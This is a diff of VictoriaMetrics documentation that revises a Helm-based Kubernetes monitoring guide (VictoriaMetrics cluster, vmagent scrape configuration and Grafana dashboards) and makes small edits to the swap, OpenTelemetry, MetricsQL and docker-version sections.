||||
http://vmcluster-victoria-metrics-cluster-vmselect.default.svc.cluster.local.:8481/select/0/prometheus/
|
||||
```
|
||||
|
||||
Note the following endpoint URLs:
|
||||
|
||||
- The `remote_write` URL will be required on [Step 3](https://docs.victoriametrics.com/guides/k8s-monitoring-via-vm-cluster/#id-3-install-vmagent-from-the-helm-chart) to configure where the `vmagent` service sends telemetry data.
|
||||
|
||||
```text
|
||||
remote_write:
|
||||
- url: http://vmcluster-victoria-metrics-cluster-vminsert.default.svc.cluster.local.:8480/insert/0/prometheus/
|
||||
```
|
||||
|
||||
- The `VictoriaMetrics read api` will be required on [Step 4](https://docs.victoriametrics.com/guides/k8s-monitoring-via-vm-cluster/#id-4-install-and-connect-grafana-to-victoriametrics-with-helm) to configure the Grafana datasource.
|
||||
|
||||
```text
|
||||
The VictoriaMetrics read api can be accessed via port 8481 with the following DNS name from within your cluster:
|
||||
vmcluster-victoria-metrics-cluster-vmselect.default.svc.cluster.local.
|
||||
```
|
||||
For us it’s important to remember the url for the datasource (copy lines from the output).
|
||||
|
||||
Verify that [VictoriaMetrics cluster](https://docs.victoriametrics.com/victoriametrics/cluster-victoriametrics/) pods are up and running by executing the following command:
|
||||
|
||||
|
||||
```sh
|
||||
kubectl get pods
|
||||
```
|
||||
|
||||
You should see a list of pods similar to this:
|
||||
The expected output is:
|
||||
|
||||
```text
|
||||
NAME READY STATUS RESTARTS AGE
|
||||
@@ -179,75 +164,266 @@ vmcluster-victoria-metrics-cluster-vmstorage-1 1/1 Running
|
||||
|
||||
## 3. Install vmagent from the Helm chart
|
||||
|
||||
In order to collect metrics from the Kubernetes cluster, we need to install [vmagent](https://docs.victoriametrics.com/victoriametrics/vmagent/). This service scrapes, relabels, and sends metrics to the `vminsert` service running in the cluster.
|
||||
To scrape metrics from Kubernetes with a [VictoriaMetrics cluster](https://docs.victoriametrics.com/victoriametrics/cluster-victoriametrics/) we need to install [vmagent](https://docs.victoriametrics.com/victoriametrics/vmagent/) with additional configuration. To do so, please run these commands in your terminal:
|
||||
|
||||
Run the following command to install the `vmagent` service in your cluster:
|
||||
|
||||
```shell
|
||||
helm install vmagent vm/victoria-metrics-agent -f https://docs.victoriametrics.com/guides/examples/guide-vmcluster-vmagent-values.yaml
|
||||
```
|
||||
|
||||
Here are the key settings in the chart values file `guide-vmcluster-vmagent-values.yaml`:
|
||||
Here is full file content `guide-vmcluster-vmagent-values.yaml`
|
||||
|
||||
- `remoteWrite` defines the `vminsert` endpoint that receives telemetry from [vmagent](https://docs.victoriametrics.com/victoriametrics/vmagent/). This value should match exactly the URL for the `remote_write` in the output of [Step 2](https://docs.victoriametrics.com/guides/k8s-monitoring-via-vm-cluster/#id-2-install-victoriametrics-cluster-from-the-helm-chart).
|
||||
```yaml
|
||||
remoteWrite:
|
||||
- url: http://vmcluster-victoria-metrics-cluster-vminsert.default.svc.cluster.local:8480/insert/0/prometheus/
|
||||
|
||||
```yaml
|
||||
remoteWrite:
|
||||
- url: http://vmcluster-victoria-metrics-cluster-vminsert.default.svc.cluster.local:8480/insert/0/prometheus/
|
||||
```
|
||||
config:
|
||||
global:
|
||||
scrape_interval: 10s
|
||||
|
||||
- `metric_relabel_configs` defines label-rewriting rules that help us show Kubernetes metrics in the Grafana dashboard later on.
|
||||
scrape_configs:
|
||||
- job_name: vmagent
|
||||
static_configs:
|
||||
- targets: ["localhost:8429"]
|
||||
- job_name: "kubernetes-apiservers"
|
||||
kubernetes_sd_configs:
|
||||
- role: endpoints
|
||||
scheme: https
|
||||
tls_config:
|
||||
ca_file: /var/run/secrets/kubernetes.io/serviceaccount/ca.crt
|
||||
insecure_skip_verify: true
|
||||
bearer_token_file: /var/run/secrets/kubernetes.io/serviceaccount/token
|
||||
relabel_configs:
|
||||
- source_labels:
|
||||
[
|
||||
__meta_kubernetes_namespace,
|
||||
__meta_kubernetes_service_name,
|
||||
__meta_kubernetes_endpoint_port_name,
|
||||
]
|
||||
action: keep
|
||||
regex: default;kubernetes;https
|
||||
- job_name: "kubernetes-nodes"
|
||||
scheme: https
|
||||
tls_config:
|
||||
ca_file: /var/run/secrets/kubernetes.io/serviceaccount/ca.crt
|
||||
insecure_skip_verify: true
|
||||
bearer_token_file: /var/run/secrets/kubernetes.io/serviceaccount/token
|
||||
kubernetes_sd_configs:
|
||||
- role: node
|
||||
relabel_configs:
|
||||
- action: labelmap
|
||||
regex: __meta_kubernetes_node_label_(.+)
|
||||
- job_name: "kubernetes-nodes-cadvisor"
|
||||
scheme: https
|
||||
tls_config:
|
||||
ca_file: /var/run/secrets/kubernetes.io/serviceaccount/ca.crt
|
||||
insecure_skip_verify: true
|
||||
bearer_token_file: /var/run/secrets/kubernetes.io/serviceaccount/token
|
||||
kubernetes_sd_configs:
|
||||
- role: node
|
||||
metrics_path: /metrics/cadvisor
|
||||
relabel_configs:
|
||||
- action: labelmap
|
||||
regex: __meta_kubernetes_node_label_(.+)
|
||||
- source_labels: [__metrics_path__]
|
||||
target_label: metrics_path
|
||||
metric_relabel_configs:
|
||||
- action: replace
|
||||
source_labels: [pod]
|
||||
regex: '(.+)'
|
||||
target_label: pod_name
|
||||
replacement: '${1}'
|
||||
- action: replace
|
||||
source_labels: [container]
|
||||
regex: '(.+)'
|
||||
target_label: container_name
|
||||
replacement: '${1}'
|
||||
- action: replace
|
||||
target_label: name
|
||||
replacement: k8s_stub
|
||||
- action: replace
|
||||
source_labels: [id]
|
||||
regex: '^/system\.slice/(.+)\.service$'
|
||||
target_label: systemd_service_name
|
||||
replacement: '${1}'
|
||||
- job_name: "kubernetes-service-endpoints"
|
||||
kubernetes_sd_configs:
|
||||
- role: endpoints
|
||||
relabel_configs:
|
||||
- action: drop
|
||||
source_labels: [__meta_kubernetes_pod_container_init]
|
||||
regex: true
|
||||
- action: keep_if_equal
|
||||
source_labels: [__meta_kubernetes_pod_annotation_prometheus_io_port, __meta_kubernetes_pod_container_port_number]
|
||||
- source_labels:
|
||||
[__meta_kubernetes_service_annotation_prometheus_io_scrape]
|
||||
action: keep
|
||||
regex: true
|
||||
- source_labels:
|
||||
[__meta_kubernetes_service_annotation_prometheus_io_scheme]
|
||||
action: replace
|
||||
target_label: __scheme__
|
||||
regex: (https?)
|
||||
- source_labels:
|
||||
[__meta_kubernetes_service_annotation_prometheus_io_path]
|
||||
action: replace
|
||||
target_label: __metrics_path__
|
||||
regex: (.+)
|
||||
- source_labels:
|
||||
[
|
||||
__address__,
|
||||
__meta_kubernetes_service_annotation_prometheus_io_port,
|
||||
]
|
||||
action: replace
|
||||
target_label: __address__
|
||||
regex: ([^:]+)(?::\d+)?;(\d+)
|
||||
replacement: $1:$2
|
||||
- action: labelmap
|
||||
regex: __meta_kubernetes_service_label_(.+)
|
||||
- source_labels: [__meta_kubernetes_namespace]
|
||||
action: replace
|
||||
target_label: kubernetes_namespace
|
||||
- source_labels: [__meta_kubernetes_service_name]
|
||||
action: replace
|
||||
target_label: kubernetes_name
|
||||
- source_labels: [__meta_kubernetes_pod_node_name]
|
||||
action: replace
|
||||
target_label: kubernetes_node
|
||||
- job_name: "kubernetes-service-endpoints-slow"
|
||||
scrape_interval: 5m
|
||||
scrape_timeout: 30s
|
||||
kubernetes_sd_configs:
|
||||
- role: endpoints
|
||||
relabel_configs:
|
||||
- action: drop
|
||||
source_labels: [__meta_kubernetes_pod_container_init]
|
||||
regex: true
|
||||
- action: keep_if_equal
|
||||
source_labels: [__meta_kubernetes_pod_annotation_prometheus_io_port, __meta_kubernetes_pod_container_port_number]
|
||||
- source_labels:
|
||||
[__meta_kubernetes_service_annotation_prometheus_io_scrape_slow]
|
||||
action: keep
|
||||
regex: true
|
||||
- source_labels:
|
||||
[__meta_kubernetes_service_annotation_prometheus_io_scheme]
|
||||
action: replace
|
||||
target_label: __scheme__
|
||||
regex: (https?)
|
||||
- source_labels:
|
||||
[__meta_kubernetes_service_annotation_prometheus_io_path]
|
||||
action: replace
|
||||
target_label: __metrics_path__
|
||||
regex: (.+)
|
||||
- source_labels:
|
||||
[
|
||||
__address__,
|
||||
__meta_kubernetes_service_annotation_prometheus_io_port,
|
||||
]
|
||||
action: replace
|
||||
target_label: __address__
|
||||
regex: ([^:]+)(?::\d+)?;(\d+)
|
||||
replacement: $1:$2
|
||||
- action: labelmap
|
||||
regex: __meta_kubernetes_service_label_(.+)
|
||||
- source_labels: [__meta_kubernetes_namespace]
|
||||
action: replace
|
||||
target_label: kubernetes_namespace
|
||||
- source_labels: [__meta_kubernetes_service_name]
|
||||
action: replace
|
||||
target_label: kubernetes_name
|
||||
- source_labels: [__meta_kubernetes_pod_node_name]
|
||||
action: replace
|
||||
target_label: kubernetes_node
|
||||
- job_name: "kubernetes-services"
|
||||
metrics_path: /probe
|
||||
params:
|
||||
module: [http_2xx]
|
||||
kubernetes_sd_configs:
|
||||
- role: service
|
||||
relabel_configs:
|
||||
- source_labels:
|
||||
[__meta_kubernetes_service_annotation_prometheus_io_probe]
|
||||
action: keep
|
||||
regex: true
|
||||
- source_labels: [__address__]
|
||||
target_label: __param_target
|
||||
- target_label: __address__
|
||||
replacement: blackbox
|
||||
- source_labels: [__param_target]
|
||||
target_label: instance
|
||||
- action: labelmap
|
||||
regex: __meta_kubernetes_service_label_(.+)
|
||||
- source_labels: [__meta_kubernetes_namespace]
|
||||
target_label: kubernetes_namespace
|
||||
- source_labels: [__meta_kubernetes_service_name]
|
||||
target_label: kubernetes_name
|
||||
- job_name: "kubernetes-pods"
|
||||
kubernetes_sd_configs:
|
||||
- role: pod
|
||||
relabel_configs:
|
||||
- action: drop
|
||||
source_labels: [__meta_kubernetes_pod_container_init]
|
||||
regex: true
|
||||
- action: keep_if_equal
|
||||
source_labels: [__meta_kubernetes_pod_annotation_prometheus_io_port, __meta_kubernetes_pod_container_port_number]
|
||||
- source_labels: [__meta_kubernetes_pod_annotation_prometheus_io_scrape]
|
||||
action: keep
|
||||
regex: true
|
||||
- source_labels: [__meta_kubernetes_pod_annotation_prometheus_io_path]
|
||||
action: replace
|
||||
target_label: __metrics_path__
|
||||
regex: (.+)
|
||||
- source_labels:
|
||||
[__address__, __meta_kubernetes_pod_annotation_prometheus_io_port]
|
||||
action: replace
|
||||
regex: ([^:]+)(?::\d+)?;(\d+)
|
||||
replacement: $1:$2
|
||||
target_label: __address__
|
||||
- action: labelmap
|
||||
regex: __meta_kubernetes_pod_label_(.+)
|
||||
- source_labels: [__meta_kubernetes_namespace]
|
||||
action: replace
|
||||
target_label: kubernetes_namespace
|
||||
- source_labels: [__meta_kubernetes_pod_name]
|
||||
action: replace
|
||||
target_label: kubernetes_pod_name
|
||||
```
|
||||
|
||||
* By updating `remoteWrite` we're configuring [vmagent](https://docs.victoriametrics.com/victoriametrics/vmagent/) to write scraped metrics into the `vminsert` service.
|
||||
* The second part of this yaml file is needed to add the `metric_relabel_configs` section that helps us to show Kubernetes metrics on the Grafana dashboard.
|
||||
|
||||
```yaml
|
||||
metric_relabel_configs:
|
||||
- action: replace
|
||||
source_labels: [pod]
|
||||
regex: '(.+)'
|
||||
target_label: pod_name
|
||||
replacement: '${1}'
|
||||
- action: replace
|
||||
source_labels: [container]
|
||||
regex: '(.+)'
|
||||
target_label: container_name
|
||||
replacement: '${1}'
|
||||
- action: replace
|
||||
target_label: name
|
||||
replacement: k8s_stub
|
||||
- action: replace
|
||||
source_labels: [id]
|
||||
regex: '^/system\.slice/(.+)\.service$'
|
||||
target_label: systemd_service_name
|
||||
replacement: '${1}'
|
||||
```
|
||||
|
||||
Verify that `vmagent`'s pod is up and running by executing the following command:
|
||||
|
||||
|
||||
```shell
|
||||
kubectl get pods | grep vmagent
|
||||
```
|
||||
|
||||
Check that the pod is in `Running` state:
|
||||
The expected output is:
|
||||
|
||||
```text
|
||||
vmagent-victoria-metrics-agent-69974b95b4-mhjph 1/1 Running 0 11m
|
||||
```
|
||||
|
||||
|
||||
## 4. Install and connect Grafana to VictoriaMetrics with Helm
|
||||
|
||||
Add the Grafana Community Helm repository:
|
||||
Add the Grafana Helm repository.
|
||||
|
||||
|
||||
```shell
|
||||
helm repo add grafana-community https://grafana-community.github.io/helm-charts
|
||||
helm repo add grafana https://grafana.github.io/helm-charts
|
||||
helm repo update
|
||||
```
|
||||
|
||||
> [!NOTE] Tip
|
||||
> See more information on Grafana in [ArtifactHUB](https://artifacthub.io/packages/helm/grafana-community/grafana)
|
||||
See more information on Grafana ArtifactHUB [https://artifacthub.io/packages/helm/grafana/grafana](https://artifacthub.io/packages/helm/grafana/grafana)
|
||||
|
||||
To install the chart with the release name `my-grafana`, add the VictoriaMetrics datasource with official dashboard and the Kubernetes dashboard:
|
||||
|
||||
Create a values config file to define the data sources and dashboards for VictoriaMetrics in the Grafana service:
|
||||
|
||||
```sh
|
||||
cat <<EOF > grafana-cluster-values.yml
|
||||
cat <<EOF | helm install my-grafana grafana/grafana -f -
|
||||
datasources:
|
||||
datasources.yaml:
|
||||
apiVersion: 1
|
||||
@@ -278,111 +454,60 @@ cat <<EOF > grafana-cluster-values.yml
|
||||
default:
|
||||
victoriametrics:
|
||||
gnetId: 11176
|
||||
revision: 18
|
||||
datasource: victoriametrics
|
||||
vmagent:
|
||||
gnetId: 12683
|
||||
revision: 7
|
||||
datasource: victoriametrics
|
||||
kubernetes:
|
||||
gnetId: 14205
|
||||
revision: 1
|
||||
datasource: victoriametrics
|
||||
EOF
|
||||
```
|
||||
|
||||
The config file defines the following settings for Grafana:
|
||||
|
||||
- Provides a VictoriaMetrics data source. This value must match the `VictoriaMetrics read api` endpoint and port obtained in [Step 2](https://docs.victoriametrics.com/guides/k8s-monitoring-via-vm-cluster/#id-2-install-victoriametrics-cluster-from-the-helm-chart) during the VictoriaMetrics cluster installation.
|
||||
- Adds three starter dashboards:
|
||||
- [VictoriaMetrics - cluster](https://grafana.com/grafana/dashboards/11176-victoriametrics-cluster/) for the [VictoriaMetrics cluster](https://docs.victoriametrics.com/victoriametrics/cluster-victoriametrics/).
|
||||
- [VictoriaMetrics - vmagent](https://grafana.com/grafana/dashboards/12683-victoriametrics-vmagent/) for the [VictoriaMetrics agent](https://docs.victoriametrics.com/victoriametrics/vmagent/).
|
||||
- [Kubernetes cluster Monitoring (via Prometheus)](https://grafana.com/grafana/dashboards/14205-kubernetes-cluster-monitoring-via-prometheus/) to show Kubernetes cluster metrics.
|
||||
|
||||
Run the following command to install the Grafana chart with the name `my-grafana`:
|
||||
|
||||
```sh
|
||||
helm install my-grafana grafana-community/grafana -f grafana-cluster-values.yml
|
||||
```
|
||||
|
||||
You should get the following output:
|
||||
|
||||
```text
|
||||
NAME: my-grafana
|
||||
LAST DEPLOYED: Wed Feb 4 15:00:28 2026
|
||||
NAMESPACE: default
|
||||
STATUS: deployed
|
||||
REVISION: 1
|
||||
DESCRIPTION: Install complete
|
||||
NOTES:
|
||||
1. Get your 'admin' user password by running:
|
||||
|
||||
kubectl get secret --namespace default my-grafana -o jsonpath="{.data.admin-password}" | base64 --decode ; echo
|
||||
By running this command we:
|
||||
* Install Grafana from the Helm repository.
|
||||
* Provision a VictoriaMetrics data source with the url from the output above which we remembered.
|
||||
* Add [this dashboard](https://grafana.com/grafana/dashboards/11176) for [VictoriaMetrics Cluster](https://docs.victoriametrics.com/victoriametrics/cluster-victoriametrics/).
|
||||
* Add [this dashboard](https://grafana.com/grafana/dashboards/12683) for [VictoriaMetrics Agent](https://docs.victoriametrics.com/victoriametrics/vmagent/).
|
||||
* Add [this dashboard](https://grafana.com/grafana/dashboards/14205) to see Kubernetes cluster metrics.
|
||||
|
||||
|
||||
2. The Grafana server can be accessed via port 80 on the following DNS name from within your cluster:
|
||||
Please see the output log in your terminal. Copy, paste and run these commands.
|
||||
The first one will show `admin` password for the Grafana admin.
|
||||
The second and the third will forward Grafana to `127.0.0.1:3000`:
|
||||
|
||||
my-grafana.default.svc.cluster.local
|
||||
|
||||
Get the Grafana URL to visit by running these commands in the same shell:
|
||||
export POD_NAME=$(kubectl get pods --namespace default -l "app.kubernetes.io/name=grafana,app.kubernetes.io/instance=my-grafana" -o jsonpath="{.items[0].metadata.name}")
|
||||
kubectl --namespace default port-forward $POD_NAME 3000
|
||||
|
||||
3. Login with the password from step 1 and the username: admin
|
||||
#################################################################################
|
||||
###### WARNING: Persistence is disabled!!! You will lose your data when #####
|
||||
###### the Grafana pod is terminated. #####
|
||||
#################################################################################
|
||||
```
|
||||
|
||||
Use the first command in the output to obtain the password for the `admin` user:
|
||||
|
||||
```shell
|
||||
kubectl get secret --namespace default my-grafana -o jsonpath="{.data.admin-password}" | base64 --decode ; echo
|
||||
|
||||
```
|
||||
export POD_NAME=$(kubectl get pods --namespace default -l "app.kubernetes.io/name=grafana,app.kubernetes.io/instance=my-grafana" -o jsonpath="{.items[0].metadata.name}")
|
||||
|
||||
The second part of the output shows how to port-forward the Grafana service in order to access it locally on `127.0.0.1:3000`:
|
||||
|
||||
```shell
|
||||
export pod_name=$(kubectl get pods --namespace default -l "app.kubernetes.io/name=grafana,app.kubernetes.io/instance=my-grafana" -o jsonpath="{.items[0].metadata.name}")
|
||||
|
||||
kubectl --namespace default port-forward $pod_name 3000
|
||||
kubectl --namespace default port-forward $POD_NAME 3000
|
||||
```
|
||||
|
||||
## 5. Check the result you obtained in your browser
|
||||
|
||||
To check that [VictoriaMetrics](https://victoriametrics.com) collects metrics from the Kubernetes cluster, open in your browser `http://127.0.0.1:3000/dashboards`. Use `admin` for login and `password` obtained in the previous step.
|
||||
|
||||
You should see three dashboards installed. Select "Kubernetes Cluster Monitoring".
|
||||
To check that [VictoriaMetrics](https://victoriametrics.com) collects metrics from k8s cluster open in browser [http://127.0.0.1:3000/dashboards](http://127.0.0.1:3000/dashboards) and choose the `Kubernetes Cluster Monitoring (via Prometheus)` dashboard. Use `admin` for login and `password` that you previously got from kubectl.
|
||||
|
||||

|
||||
<figcaption style="text-align: center; font-style: italic;">List of pre-installed dashboards in Grafana</figcaption>
|
||||
|
||||
This is the main dashboard, which shows activity across your Kubernetes cluster:
|
||||
You will see something like this:
|
||||
|
||||

|
||||
<figcaption style="text-align: center; font-style: italic;">Grafana dashboard for Kubernetes metrics</figcaption>
|
||||

|
||||
|
||||
The VictoriaMetrics cluster dashboard is also available to monitor telemetry ingestion and resource utilization:
|
||||
The VictoriaMetrics dashboard is also available to use:
|
||||
|
||||

|
||||
<figcaption style="text-align: center; font-style: italic;">Grafana dashboard for VictoriaMetrics services</figcaption>
|
||||

|
||||
|
||||
And vmagent has a separate dashboard to monitor scraping and queue activity:
|
||||
vmagent has its own dashboard:
|
||||
|
||||

|
||||
<figcaption style="text-align: center; font-style: italic;">Grafana dashboard for vmagent ingestion and resource usage</figcaption>
|
||||

|
||||
|
||||
## 6. Final thoughts
|
||||
|
||||
- We set up a TimeSeries Database for your Kubernetes cluster.
|
||||
- We collected metrics from all running pods, nodes, and services and stored them in a VictoriaMetrics database.
|
||||
- We visualized resources used in the Kubernetes cluster by using Grafana dashboards.
|
||||
|
||||
Consider reading these resources to complete your setup:
|
||||
|
||||
- VictoriaMetrics
|
||||
- [Learn more about the cluster version](https://docs.victoriametrics.com/victoriametrics/cluster-victoriametrics/)
|
||||
- [Migrate existing metric data into VictoriaMetrics with vmctl](https://docs.victoriametrics.com/victoriametrics/vmctl/)
|
||||
- [Setup alerts](https://docs.victoriametrics.com/victoriametrics/vmalert/)
|
||||
- Grafana
|
||||
- [Enable persistent storage](https://grafana.com/docs/grafana/latest/setup-grafana/installation/helm/#enable-persistent-storage-recommended)
|
||||
- [Configure private TLS authority](https://grafana.com/docs/grafana/latest/setup-grafana/installation/helm/#configure-a-private-ca-certificate-authority)
|
||||
* We set up TimeSeries Database for your Kubernetes cluster.
|
||||
* We collected metrics from all running pods,nodes, … and stored them in a VictoriaMetrics database.
|
||||
* We visualized resources used in the Kubernetes cluster by using Grafana dashboards.
|
||||
|
||||
|
Before Width: | Height: | Size: 516 KiB After Width: | Height: | Size: 60 KiB |
|
Before Width: | Height: | Size: 244 KiB After Width: | Height: | Size: 18 KiB |
|
Before Width: | Height: | Size: 506 KiB |
|
Before Width: | Height: | Size: 434 KiB |
@@ -24,7 +24,7 @@ Resources:
|
||||
VictoriaMetrics single-node, vmagent and vminsert components support ingestion of metrics via OpenTelemetry Protocol (OTLP)
|
||||
from [OpenTelemetry Collector](https://opentelemetry.io/docs/collector/) and applications instrumented with [OpenTelemetry SDKs](https://opentelemetry.io/docs/languages/).
|
||||
|
||||
See the detailed description about protocol support [here](https://docs.victoriametrics.com/victoriametrics/integrations/opentelemetry/).
|
||||
See the detailed description about protocol support [here](https://docs.victoriametrics.com/victoriametrics/#sending-data-via-opentelemetry).
|
||||
|
||||
> See a practical guide [How to use OpenTelemetry metrics with VictoriaMetrics](https://docs.victoriametrics.com/guides/getting-started-with-opentelemetry/).
|
||||
|
||||
|
||||
@@ -21,9 +21,9 @@ It is recommended to run the latest available release of VictoriaMetrics from [t
|
||||
There is no need to tune VictoriaMetrics because it uses reasonable defaults for command-line flags. These flags are automatically adjusted for the available CPU and RAM resources. There is no need in Operating System tuning because VictoriaMetrics is optimized for default OS settings. The only option is to increase the limit on the [number of open files in the OS](https://medium.com/@muhammadtriwibowo/set-permanently-ulimit-n-open-files-in-ubuntu-4d61064429a), so VictoriaMetrics could accept more incoming connections and could keep open more data files.
|
||||
|
||||
## Swap
|
||||
|
||||
It is recommended to disable swap for machines running [vmstorage](https://docs.victoriametrics.com/victoriametrics/cluster-victoriametrics/#storage) or [Single-node VictoriaMetrics](https://docs.victoriametrics.com/victoriametrics/single-server-victoriametrics/).
|
||||
If swap is enabled, the operating system may move actively used data from fast RAM to much slower disk storage when memory usage approaches system limits or configured thresholds.
|
||||
For machines running [vmstorage](https://docs.victoriametrics.com/victoriametrics/cluster-victoriametrics/#storage) or [Single-node VictoriaMetrics](https://docs.victoriametrics.com/victoriametrics/single-server-victoriametrics/), it is recommended to disable swap.
|
||||
These components rely on available RAM for high performance operations.
|
||||
If swap is enabled, the operating system may move active data from fast RAM to the much slower disk as memory usage approaches system limits or configured thresholds.
|
||||
This leads to performance degradation and latency spikes. On systemd-based Linux distributions run:
|
||||
|
||||
```sh
|
||||
@@ -34,8 +34,7 @@ systemctl mask swap.target
|
||||
Reboot the host after applying the commands.
|
||||
|
||||
If you're unsure whether swap-related issues are occurring, check the `Troubleshooting – Major page faults`
|
||||
and `Resource usage – Memory pressure` panels on [official Grafana dashboards](https://grafana.com/orgs/victoriametrics/dashboards) for VictoriaMetrics.
|
||||
See how to [monitor VictoriaMetrics](https://docs.victoriametrics.com/victoriametrics/#monitoring).
|
||||
and `Resource usage – Memory pressure` panels in official Grafana dashboards.
|
||||
|
||||
## Filesystem
|
||||
|
||||
|
||||
@@ -595,7 +595,7 @@ Check practical examples of [VictoriaMetrics API](https://docs.victoriametrics.c
|
||||
- `prometheus/api/v1/import/native` - for importing data obtained via `api/v1/export/native` on `vmselect` (see below).
|
||||
- `prometheus/api/v1/import/csv` - for importing arbitrary CSV data. See [these docs](https://docs.victoriametrics.com/victoriametrics/single-server-victoriametrics/#how-to-import-csv-data) for details.
|
||||
- `prometheus/api/v1/import/prometheus` - for importing data in [Prometheus text exposition format](https://github.com/prometheus/docs/blob/master/content/docs/instrumenting/exposition_formats.md#text-based-format) and in [OpenMetrics format](https://github.com/OpenObservability/OpenMetrics/blob/master/specification/OpenMetrics.md). This endpoint also supports [Pushgateway protocol](https://github.com/prometheus/pushgateway#url). See [these docs](https://docs.victoriametrics.com/victoriametrics/single-server-victoriametrics/#how-to-import-data-in-prometheus-exposition-format) for details.
|
||||
- `opentelemetry/v1/metrics` - for ingesting data via [OpenTelemetry protocol for metrics](https://github.com/open-telemetry/opentelemetry-specification/blob/97c826b70e2f89cfdf655d5150791f3f0c2bae19/specification/metrics/data-model.md). See [these docs](https://docs.victoriametrics.com/victoriametrics/integrations/opentelemetry/).
|
||||
- `opentelemetry/v1/metrics` - for ingesting data via [OpenTelemetry protocol for metrics](https://github.com/open-telemetry/opentelemetry-specification/blob/ffddc289462dfe0c2041e3ca42a7b1df805706de/specification/metrics/data-model.md). See [these docs](https://docs.victoriametrics.com/victoriametrics/single-server-victoriametrics/#sending-data-via-opentelemetry).
|
||||
- `datadog/api/v1/series` - for ingesting data with DataDog submit metrics API v1. See [these docs](https://docs.victoriametrics.com/victoriametrics/url-examples/#datadogapiv1series) for details.
|
||||
- `datadog/api/v2/series` - for ingesting data with [DataDog submit metrics API](https://docs.datadoghq.com/api/latest/metrics/#submit-metrics). See [these docs](https://docs.victoriametrics.com/victoriametrics/integrations/datadog/) for details.
|
||||
- `datadog/api/beta/sketches` - for ingesting data with [DataDog lambda extension](https://docs.datadoghq.com/serverless/libraries_integrations/extension/).
|
||||
@@ -1015,7 +1015,7 @@ to ensure query results consistency, even if storage layer didn't complete dedup
|
||||
## Metrics Metadata
|
||||
|
||||
Cluster version of VictoriaMetrics can store metric metadata (TYPE, HELP, UNIT) {{% available_from "v1.130.0" %}}.
|
||||
Metadata ingestion is enabled by default{{% available_from "v1.137.0" %}}. To disable it, set `-enableMetadata=false` on `vminsert`, and `vmagent`.
|
||||
Metadata ingestion is enabled by default{{% available_from "#" %}}. To disable it, set `-enableMetadata=false` on `vminsert`, and `vmagent`.
|
||||
|
||||
The metadata is cached in-memory in a ring buffer and can use up to 1% of available memory by default (see `-storage.maxMetadataStorageSize` cmd-line flag).
|
||||
When in-memory size is exceeded, the least updated entries are dropped first. Entries that weren't updated for 1h are cleaned up automatically.
|
||||
|
||||
@@ -557,8 +557,8 @@ and proportionally to the total length of all the labels seen across all the reg
|
||||
|
||||
Typical monitoring in Kubernetes generates moderate-to-high churn rate for time series because every restart of the `pod` creates a new set of time series
|
||||
for all the [metrics](https://docs.victoriametrics.com/victoriametrics/keyconcepts/#what-is-a-metric) exposed by that pod, with a new `pod` label.
|
||||
The number of labels and the total length of `label=value` pairs per every time series in Kubernetes is quite large
|
||||
(~30-40 labels with ~1KB total length of `label=value` pairs per time series). This contributes to quick growth of the `indexdb` over time,
|
||||
The number of labels and the summary length of `label=value` pairs per every time series in Kubernetes is quite large
|
||||
(~30-40 labels with ~1KB summary length of `label=value` pairs per time series). This contributes to quick growth of the `indexdb` over time,
|
||||
so its' size may exceed the size of the `data` folder by up to 2x in typical production cases.
|
||||
|
||||
There are the following workarounds, which can reduce the growth rate of the `indexdb`:
|
||||
|
||||
@@ -1227,10 +1227,7 @@ Metric names are stripped from the resulting series. Add [keep_metric_names](#ke
|
||||
#### buckets_limit
|
||||
|
||||
`buckets_limit(limit, buckets)` is a [transform function](#transform-functions), which limits the number
|
||||
of [histogram buckets](https://valyala.medium.com/improving-histogram-usability-for-prometheus-and-grafana-bc7e5df0e350) to the given `limit`.
|
||||
|
||||
The result will preserve the first and the last bucket to improve accuracy for min and max values.
|
||||
So, if the `limit` is greater than 0 and less than 3, the function will still return 3 buckets: the first bucket, the last bucket, and a selected bucket.
|
||||
of [histogram buckets](https://valyala.medium.com/improving-histogram-usability-for-prometheus-and-grafana-bc7e5df0e350) to the given `limit`.
|
||||
|
||||
See also [prometheus_buckets](#prometheus_buckets) and [histogram_quantile](#histogram_quantile).
|
||||
|
||||
@@ -1384,15 +1381,6 @@ It can be used for calculating the average over the given time range across mult
|
||||
For example, `histogram_avg(sum(histogram_over_time(response_time_duration_seconds[5m])) by (vmrange,job))` would return the average response time
|
||||
per each `job` over the last 5 minutes.
|
||||
|
||||
#### histogram_fraction
|
||||
|
||||
`histogram_fraction(lowerLe, upperLe, buckets)` is a [transform function](#transform-functions), which calculates the share (in the range `[0...1]`) for `buckets` that fall between `lowerLe` and `upperLe`.
|
||||
The result of `histogram_fraction(lowerLe, upperLe, buckets)` is equivalent to `histogram_share(upperLe, buckets) - histogram_share(lowerLe, buckets)`.
|
||||
|
||||
This function is supported by PromQL.
|
||||
|
||||
See also [histogram_share](#histogram_share).
|
||||
|
||||
#### histogram_quantile
|
||||
|
||||
`histogram_quantile(phi, buckets)` is a [transform function](#transform-functions), which calculates `phi`-[percentile](https://en.wikipedia.org/wiki/Percentile)
|
||||
|
||||
@@ -58,9 +58,9 @@ Download the newest available [VictoriaMetrics release](https://docs.victoriamet
|
||||
from [DockerHub](https://hub.docker.com/r/victoriametrics/victoria-metrics) or [Quay](https://quay.io/repository/victoriametrics/victoria-metrics?tab=tags):
|
||||
|
||||
```sh
|
||||
docker pull victoriametrics/victoria-metrics:v1.137.0
|
||||
docker pull victoriametrics/victoria-metrics:v1.136.0
|
||||
docker run -it --rm -v `pwd`/victoria-metrics-data:/victoria-metrics-data -p 8428:8428 \
|
||||
victoriametrics/victoria-metrics:v1.137.0 --selfScrapeInterval=5s -storageDataPath=victoria-metrics-data
|
||||
victoriametrics/victoria-metrics:v1.136.0 --selfScrapeInterval=5s -storageDataPath=victoria-metrics-data
|
||||
```
|
||||
|
||||
_For Enterprise images see [this link](https://docs.victoriametrics.com/victoriametrics/enterprise/#docker-images)._
|
||||
|
||||